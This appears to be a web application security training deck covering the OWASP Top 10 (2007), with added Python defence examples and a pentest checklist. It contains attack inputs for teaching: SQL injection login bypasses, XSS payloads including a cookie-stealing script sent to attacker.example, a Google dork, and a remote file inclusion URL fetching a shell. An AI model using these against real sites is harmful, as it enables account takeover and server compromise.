Session Flow
- What is Web Application Security?
- Security Misconceptions
- Reasons for Attacking Web Applications
- OWASP Top 10 Vulnerabilities
- Security Guidelines
- Web Application Security Checklist
Problem Illustration
Application layer: the attacker sends attacks inside valid HTTP requests, and your custom code is tricked into doing something it should not. Security at this layer requires software development expertise, not signatures.
Network layer: firewall, OS hardening, patching, IDS and SSL cannot detect or stop attacks carried inside HTTP requests; their security relies on signature databases.
[Diagram: an application attack, from outside or from an insider, passes through the firewall to the hardened OS and the custom code (Billing) of the application layer, which fronts Communication, Knowledge Mgmt, E-Commerce, Bus. Functions, Legacy Systems, Administration, Transactions, Human Resrcs, Web Services, Directories, Databases, Accounts and Finance.]
Security Misconceptions
"The firewall protects my web server and database"
- Access to the server through ports 80 and 443 makes the web server part of your external perimeter defence.
- Vulnerabilities in the web server software or in the web applications may allow access to internal network resources.
Security Misconceptions
"The IDS protects my web server and database"
- The IDS is configured to detect signatures of various well-known attacks.
- Attack signatures do not include those for attacks against your custom applications.
Security Misconceptions
"SSL secures my site"
- SSL secures the transport of data between the web server and the user's browser.
- SSL does not protect against attacks on the server and its applications.
- SSL is the hacker's best friend because of the false sense of security it creates: the attack arrives inside the encrypted channel, where network devices cannot inspect it.
OWASP Top 10 Vulnerabilities (2007 edition)
1. Injection Flaws
2. Cross Site Scripting (XSS)
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross Site Request Forgery (CSRF)
6. Information Leakage and Improper Error Handling
7. Broken Authentication and Session Management
8. Insecure Cryptographic Storage
9. Insecure Communications
10. Failure to Restrict URL Access
Injection Flaws
Injection means tricking an application into including unintended commands in the data it sends to an interpreter.
Interpreters take strings and interpret them as commands: SQL, OS shell, LDAP, XPath, etc.
SQL injection is still quite common; many applications remain susceptible.
Injection Flaws: illustration
Attacker enters SQL fragments into a web page that uses the input in a query:
  SELECT * FROM accounts WHERE acct = '' OR 1=1--
1. Application presents a form (Account Summary, with Account and SKU fields) to the attacker, all via SSL.
2. Attacker sends an attack in the form data.
3. Application forwards the attack to the database in a SQL query.
4. Database runs the query containing the attack and sends the encrypted results back to the application (the whole table, e.g. Acct: 5424-6066-2134-4334, ...).
5. Application decrypts the data as normal and sends the results to the user.
[Diagram: the attack passes through the firewall to the custom code (Billing) in the application layer and on to the DB table, alongside Legacy Systems, Administration, Transactions, Directories, Human Resrcs, Web Services, Databases, Accounts and Finance.]
SQL Injection
It is a flaw in web application development; it is not a database or web server problem. Most programmers are still not aware of it, a lot of tutorials and demo templates are vulnerable, and, worse, a lot of the "solutions" posted on the Internet are not good enough. In our pen tests over 60% of our clients turn out to be vulnerable to SQL injection.
SQL Injection
Common vulnerable login query:
  SELECT * FROM users WHERE login = 'victor' AND password = '123'
(If it returns something, then log in!)
ASP/MS SQL Server login syntax:
  var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";
SQL Injection
Injecting Through Strings
  formusr = ' or 1=1 --
  formpwd = anything
Final query would look like this:
  SELECT * FROM users WHERE login = '' or 1=1 -- ' AND password = 'anything'
The quote closes the string, OR 1=1 makes the WHERE clause true for every row, and the comment marker (-- in SQL Server; -- or # in MySQL) discards the password check. Without the comment the query is parsed as login = '' OR (1=1 AND password = 'anything'), because AND binds tighter than OR, so it only matches a user whose password is literally "anything".
SQL Injection
The Power of '
It closes the string parameter. Everything after it is considered part of the SQL command.
  SELECT * FROM clients WHERE account = 12345678 AND pin = 1111
PHP/MySQL login syntax:
  $sql = "SELECT * FROM clients WHERE " .
         "account = $formacct AND " .
         "pin = $formpin";
SQL Injection
Injecting Numeric Fields
  $formacct = 1 or 1=1 #
  $formpin = 1111
No quote is needed here, because the numeric field is not quoted in the query. Final query would look like this:
  SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111
SQL Injection
Standard SQL commands such as SELECT, INSERT, UPDATE, DELETE, CREATE and DROP can be used to accomplish almost everything one needs to do with a database. When you click a link like www.site.com/news.asp?ArticleID=10, the link tells the site to look in the table that stores the articles for the one whose ArticleID is 10; if that number is concatenated into the query, it is an injection point just like the login form.
SQL Injection
INFORMATION_SCHEMA holds the names of every table and column in the database, which is why attackers query it as soon as they have a working injection point. It is exposed under that fixed name by MySQL (5.0 and later), Microsoft SQL Server and PostgreSQL; Oracle uses ALL_TABLES and ALL_TAB_COLUMNS instead, and SQLite uses sqlite_master, so "every SQL server" is an overstatement, but the principle (a catalogue the attacker can read) holds everywhere.
Reflected XSS
Request to http://www.boi.com carrying the payload <script>alert(document.cookie)</script>: the site reflects the script back to the user, where it executes and displays the session cookie in a pop-up.
Finding XSS
Most common locations: blogs, forums, shout boxes, comment boxes, search boxes; there are too many to mention.
Using Google dorks to find candidates:  inurl:"search.php?q="
XSS examples:
  http://site.com/search.php?q=<script>alert("XSS")</script>
  http://site.com/search.php?q=<script>window.open("http://www.google.com/")</script>
XSS
XSS Demo
Stored XSS
1. Attacker sets the trap ("update my profile") on an application with a stored XSS vulnerability: the attacker enters a malicious script into a web page that stores the data on the server (custom code backed by Administration, Transactions, Accounts and Finance).
2. Victim views the page containing the stored script.
3. Script runs inside the victim's browser with full access to the DOM and cookies, and silently sends the attacker the victim's session cookie.
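Both the reflected case (the search.php?q= examples) and the stored case (the profile trap) come down to one mistake: attacker-controlled text is written into the HTML response without output encoding. The following is an added example, not code from the slides; the search page, the in-memory profile store and the payloads are constructed for it. Python's html.escape does the HTML-context encoding.

```python
import html
from urllib.parse import parse_qs, urlparse


def query_param(url, name):
    """Pull one query-string parameter out of a URL (constructed helper)."""
    return parse_qs(urlparse(url).query, keep_blank_values=True).get(name, [""])[0]


def vulnerable_search_page(url):
    """Reflected XSS: the q parameter is pasted straight into the HTML response."""
    q = query_param(url, "q")
    return f"<h1>Results for {q}</h1>"


def safe_search_page(url):
    """Fix: encode for the HTML context at output time; < > & ' " become entities."""
    q = query_param(url, "q")
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


# Stored XSS: a tiny in-memory profile store, constructed for the example.
PROFILES = {}


def update_profile(user, bio):
    """Storing the raw text is fine; what decides the outcome is how it is rendered."""
    PROFILES[user] = bio


def render_profile_vulnerable(user):
    return f'<div class="bio">{PROFILES[user]}</div>'


def render_profile_safe(user):
    return f'<div class="bio">{html.escape(PROFILES[user], quote=True)}</div>'


def renders_active_script(page):
    """Crude check: does the page still contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    url = 'http://site.com/search.php?q=<script>alert("XSS")</script>'
    print(vulnerable_search_page(url))
    print(safe_search_page(url))
    update_profile("mallory", "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>")
    print(render_profile_vulnerable("mallory"))
    print(render_profile_safe("mallory"))
```

Encoding belongs at the point of output, and the encoder must match the context (HTML body here; attribute, JavaScript and URL contexts each need their own). Marking the session cookie HttpOnly keeps document.cookie from revealing it, which blunts the cookie-theft demo but does not stop anything else the injected script can do.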
Malicious File Execution: remote file inclusion
1. Attacker sends a request that specifies the path to a malicious file in a parameter.
2. The PHP application (custom code reading from the file system) includes the specified file and executes its contents.
3. Attacker views the results of executing the attack, or takes control of the affected server.
RFI
If allow_url_include is On in php.ini (it is Off by default since PHP 5.2; before that, allow_url_fopen governed URL includes), we can inject a shell directly. You only need to point the vulnerable parameter, via GET or POST, at a URI that serves the shell source with a non-PHP extension, so the attacker's own server returns the raw code instead of executing it. Take a link such as
  http://www.techdefence.com/index.php?page=news.php
If index.php includes the page parameter without any check, like
  <?php include($_GET['page']); ?>
then the attacker rewrites the URL as
  http://www.techdefence.com/index.php?page=http://www.evilscript.com/shell.txt
and the victim's server fetches shell.txt and executes it as PHP.
Fixing RFI
Practise secure coding: never pass user input to include/require. Map the parameter onto a fixed allowlist of page names and refuse anything else, including URLs, stream wrappers such as php://, and path traversal (../).
Switching from $_GET to $_POST does not help: an attacker controls a POST body as easily as a query string.
Set allow_url_include = Off (and, unless the application needs remote fopen, allow_url_fopen = Off), and restrict the include path with open_basedir.
Set file permissions so the web server user can read only what it must and write only where it must.
PHP safe_mode used to be recommended here, but it was deprecated in PHP 5.3 and removed in 5.4, so do not rely on it. Use disable_functions to block dangerous functions (system, exec, shell_exec, passthru) and, on the Linux host, remove or restrict commands the application never needs.
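The allowlist check described for the page parameter, written out as an added example; it is not code from the slides and the directory and page names in it are assumptions. The logic is the same whether it is implemented in PHP before include() or, as here, in Python: refuse anything with a URL scheme (http://, ftp://, php://, data:), refuse NUL bytes, require an exact allowlist match, and then confirm the resolved path still lies under the pages directory as defence in depth.

```python
import os
from urllib.parse import urlparse

# Assumed values for the example; the real directory and page list belong to the application.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"news.php", "about.php", "contact.php"}


class IncludeRejected(ValueError):
    """Raised for any include target that is not on the allowlist."""


def resolve_page(page, pages_dir=PAGES_DIR, allowed=ALLOWED_PAGES):
    """Map a user-supplied page name to a local file path, or refuse."""
    if urlparse(page).scheme:
        # http://evil/shell.txt, ftp://..., php://input, data:... all carry a scheme
        raise IncludeRejected(f"remote or wrapper include refused: {page!r}")
    if "\x00" in page:
        # NUL used to truncate names in older PHP; reject rather than guess
        raise IncludeRejected("NUL byte in page name")
    if page not in allowed:
        raise IncludeRejected(f"page not on allowlist: {page!r}")
    base = os.path.realpath(pages_dir)
    full = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, full]) != base:
        # cannot happen with an exact allowlist, kept in case the list is ever loosened
        raise IncludeRejected(f"path escapes {base}: {full}")
    return full


def is_includable(page):
    """Boolean wrapper for callers that just want a yes/no."""
    try:
        resolve_page(page)
        return True
    except IncludeRejected:
        return False


if __name__ == "__main__":
    for candidate in ["news.php", "http://www.evilscript.com/shell.txt",
                      "php://input", "../../../etc/passwd", "news.php\x00.txt"]:
        print(repr(candidate), "->", "include" if is_includable(candidate) else "REJECT")
```

With allow_url_include = Off in php.ini as well, the remote case is blocked twice; the allowlist is still needed because local file inclusion (../../etc/passwd, uploaded files, log files) does not depend on that setting.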
Information Leakage and Improper Error Handling
Applications can unintentionally leak information about their configuration or internal workings, or violate privacy, through a variety of application problems. They can also leak internal state through how long they take to process certain operations, or through different responses to differing inputs, such as displaying the same error text with different error numbers. Web applications often leak information about their internal state through detailed or debug error messages.
Fixing Information Leakage and Improper Error Handling
Ensure that the entire software development team shares a common approach to exception handling. Disable or limit detailed error handling; in particular, do not display debug information, stack traces or path information to end users. Ensure that secure paths that have multiple outcomes (for example, "no such user" versus "wrong password") return similar or identical error messages in roughly the same time.
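Both halves of that advice in one added example (not code from the slides): a wrapper that keeps the exception detail on the server and hands the user only a reference id, and a login check whose two failure outcomes share one message and one code path. The in-memory log list, the user table and the handler that raises are constructed for the example; a real application would use a salted, slow password hash rather than plain SHA-256.

```python
import hashlib
import hmac
import traceback
import uuid

# Constructed in-memory log sink so the example runs offline; a real app writes to its logger.
SERVER_LOG = []

GENERIC_ERROR = "Something went wrong. Please quote reference {ref} to support."


def guarded(handler, *args):
    """Run a request handler; detail goes to the server log, only a reference id to the user."""
    try:
        return 200, handler(*args)
    except Exception as exc:
        ref = uuid.uuid4().hex[:12]
        SERVER_LOG.append({"ref": ref, "error": repr(exc), "trace": traceback.format_exc()})
        return 500, GENERIC_ERROR.format(ref=ref)


def broken_handler(path):
    """Stands in for code whose exception text carries a server path (constructed)."""
    raise FileNotFoundError(f"cannot open config file {path}")


def pw_hash(password):
    return hashlib.sha256(password.encode()).digest()


# Constructed user table: login -> hash. A dummy hash keeps the unknown-user path the same length.
USERS = {"victor": pw_hash("s3cret")}
_DUMMY = pw_hash("dummy-so-unknown-users-take-the-same-time")


def login(user, password):
    """Unknown user and wrong password do the same work and return the same message."""
    stored = USERS.get(user, _DUMMY)
    ok = hmac.compare_digest(stored, pw_hash(password)) and user in USERS
    return "Welcome" if ok else "Invalid username or password"


if __name__ == "__main__":
    print(guarded(broken_handler, "/var/www/app/config/db.ini"))
    print(SERVER_LOG[-1]["error"])
    print(login("victor", "wrong"), "|", login("nobody", "wrong"))
```

The reference id is what lets support correlate a user's report with the full trace without the trace ever leaving the server.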
Vulnerability Scanners
Security Guidelines
1. Validate Input and Output
2. Fail Securely (Closed)
3. Keep It Simple
4. Use and Reuse Trusted Components
5. Defence in Depth
6. Only as Secure as the Weakest Link
7. Security by Obscurity Won't Work
8. Least Privilege
9. Compartmentalization (Separation of Privileges)
Fail Securely
When it fails, it fails closed: it should fall into a state that rejects all subsequent security requests. A good analogy is a firewall: if a firewall fails, it should drop all subsequent packets.
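The firewall analogy applied to application code, as an added example that is not from the slides: an authorisation gate that denies when its policy backend throws, and stays denied until an operator resets it, rather than treating "no answer" as "allowed". The policy table and the flaky backend are constructed for the example.

```python
class AuthorizationGate:
    """Wraps a policy lookup (think LDAP or ACL query) so that any failure denies."""

    def __init__(self, policy_lookup):
        self._lookup = policy_lookup   # callable(user, action) -> True / False
        self.tripped = False

    def allow(self, user, action):
        if self.tripped:
            return False                # closed until an operator resets the gate
        try:
            decision = self._lookup(user, action)
        except Exception:
            self.tripped = True         # backend broke: reject everything from here on
            return False
        return decision is True         # None, "", 0 or anything non-boolean means deny

    def reset(self):
        """Operator action after the backend has been repaired."""
        self.tripped = False


# Constructed policy and a backend that fails, for the demo.
POLICY = {("victor", "read"): True, ("victor", "delete"): False}


def policy_lookup(user, action):
    return POLICY.get((user, action), False)   # unknown pairs are simply denied


def broken_lookup(user, action):
    raise ConnectionError("policy service unreachable")


if __name__ == "__main__":
    gate = AuthorizationGate(policy_lookup)
    print(gate.allow("victor", "read"), gate.allow("victor", "delete"), gate.allow("mallory", "read"))
    gate = AuthorizationGate(broken_lookup)
    print(gate.allow("victor", "read"), gate.tripped)   # False True
```

The common bug this guards against is a bare try/except around the lookup that falls through to the success branch, which turns an outage in the policy service into an authorisation bypass.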
Keep It Simple
If a security system is too complex for its user base, it will either not be used or users will try to find measures to bypass it. This message applies equally to tasks that an administrator must perform in order to secure an application. This message is also intended for security layer API's that application developers must use to build the system.
Defence In Depth
Relying on one component to perform its function 100% of the time is unrealistic. While we hope to build software and hardware that works as planned, predicting the unexpected is difficult. Good systems don't predict the unexpected, but plan for it.
Least Privilege
Systems should be designed in such a way that they run with the least amount of system privilege they need to do their job.
Compartmentalization (Separation of Privileges)
Compartmentalizing users, processes and data helps contain problems if they do occur. Compartmentalization is an important concept widely adopted in the information security realm.
Session Management
- Token protection
- Session duration
- Idle-time duration
- Can the session ID format be guessed?
- Is the session ID transferred in the URL or in the body?
- Is the session ID linked to the client IP address?
- What happens when the Referer header is changed?
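A first pass at the "guess session ID format" item, as an added example that is not from the slides: given a sample of session ids captured from the application, flag the properties a pentester checks by eye (too short, digits only, sequential, low character entropy), and show what a server should issue instead. The sample ids and thresholds are constructed for the example; the pooled character entropy is only an upper bound on real randomness, so a clean result here is not proof of a good generator.

```python
import math
import secrets
from collections import Counter


def entropy_bits_per_char(ids):
    """Shannon entropy of the pooled character distribution across all sampled ids."""
    counts = Counter("".join(ids))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def looks_sequential(ids):
    """True when every id parses as an integer and sorted neighbours differ by at most 10."""
    try:
        nums = sorted(int(i) for i in ids)
    except ValueError:
        return False
    return len(nums) > 1 and all(b - a <= 10 for a, b in zip(nums, nums[1:]))


def assess_session_ids(ids, min_len=16, min_bits_per_char=3.5):
    """Return findings for a sample of observed session ids; an empty list means nothing flagged."""
    if not ids:
        return []
    findings = []
    if any(len(i) < min_len for i in ids):
        findings.append("short")
    if all(i.isdigit() for i in ids):
        findings.append("numeric-only")
    if looks_sequential(ids):
        findings.append("sequential")
    if entropy_bits_per_char(ids) < min_bits_per_char:
        findings.append("low-entropy")
    return findings


def new_session_id():
    """What the server should issue: 32 bytes from the OS CSPRNG, URL-safe encoded."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    captured = ["1001", "1002", "1003", "1004"]          # constructed "bad" sample
    print(assess_session_ids(captured))                  # all four findings
    print(assess_session_ids([new_session_id() for _ in range(20)]))   # []
```

The other checklist items (idle timeout, binding to IP, URL versus body transport) are checked by behaviour rather than by inspecting the token, so they are not covered here.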
Backend Authentication
- Trust relationships
- Encryption
- Plaintext password in HTML
- Password in configuration file
XSS
- Which type: stored or reflected?
- Check whether 404/500 error pages echo request data back.
- Input validation.
Misconfiguration
- Nikto results
- Nessus results
- Patch level
- Directory listing
- Directory permissions
- Error messages
- Default username/password
- SSL certificate configuration
- Debug or configuration files
- Check for the latest vulnerabilities
Unwanted
- Backup files
- Default files
- Services
- Remote admin access
SQL Injection
- Mirror the website and search for all input parameters
- Gain database-related information
- Error messages
- Privileges given to the web server or database
Access Points
- Ability to brute-force at the discovered access points
- Ability to bypass authentication with spoofed tokens
- Ability to conduct replay attacks
- Forced browsing: does the application keep a check by tracking the requests from each user?
Our Services
TechInvestigations A Cyber Crime Investigation unit
If you want to catch a criminal, then think like one. Analysing, investigating and accumulating digital evidence and cyber trails is better known as cyber crime investigation. Evidence can be found in computer hard disks, cell phones, CDs, DVDs, floppies, computer networks, the Internet, etc. We make law enforcement and government agencies aware of the various cyber crimes, guide them on how to prevent them, solve cyber crime cases with our technical expertise, and help them legally resolve cases and bring cyber criminals to justice.
Our Services
TechInvestigation A Cyber Crime Investigation unit Our Recent Cases:
Ahmedabad serial bomb blast terror mail case: traced the terror mail trail of the Ahmedabad serial bomb blast case. Cyber investigation of the Mumbai blasts: we successfully accomplished the task of obtaining confidential information from Jamat-ud-Dawah.
Our Services
TechHackscan A Vulnerability Assessment & Penetration Testing unit
Where you see the facilities, we see the flaws. As penetration testers and website security auditors, we evaluate the security of clients' websites through a controlled and managed simulation of an intrusion into your system by a malicious user (a cracker). We carry out an active analysis of the websites for any potential vulnerability resulting from poor or improper system configuration or development, and we submit both a developer report and a remediation report.
Our Services
TechForensics A Cyber Forensics Unit
With the right application of science and technology to the acquisition, preservation, identification, analysis and presentation of digital evidence, we preserve the integrity of the digital information while keeping it legally admissible. We provide high-quality, instructor-led interactive training to help legal firms, accounting firms, government and law enforcement agencies perform better in cyber forensic matters. We can also work on framework development for Cyber Forensics Labs (CFL).
Our Services
Training & Workshops
TechDefence Certified Cyber Security Expert (CCSE). NASSCOM predicts a requirement of 1,88,000 security professionals by 2010; currently the number of security professionals in India is around 22,000. CCSE is a career-oriented, hands-on training program on advanced ethical hacking, cyber crime investigation, cyber forensics and penetration testing.
Our Clients
Private Sector VAPT Computer Clinic - Mauritius Multievents Ltd - Mauritius Noble Ventures USA Future Group Mid Day, Delhi Govt Sector Crime Branch, Ahmedabad ATS, Mumbai URICM, Gandhi Nagar Chief Ministers Office, Government of Gujarat
Our Clients
Corporate Workshops: Hackintosh 2009, YAHOO!, Google, K7 Antivirus, ZOHO, KPMG, HCL, TCS, Deloitte, ISACA, Temenos.
TechDefence Labs
A Research & Development Unit focusing on Secure Software Development,
Client Security Products and Security Product Development. TechDefence projects on offer: HIDS (Host-based Intrusion Detection System), Centralized Cyber Café Monitoring & Reporting System, File Encrypter, Online VAPT Scanner, Online Multi-Antivirus Scanner.
Thank You
sunny@techdefence.com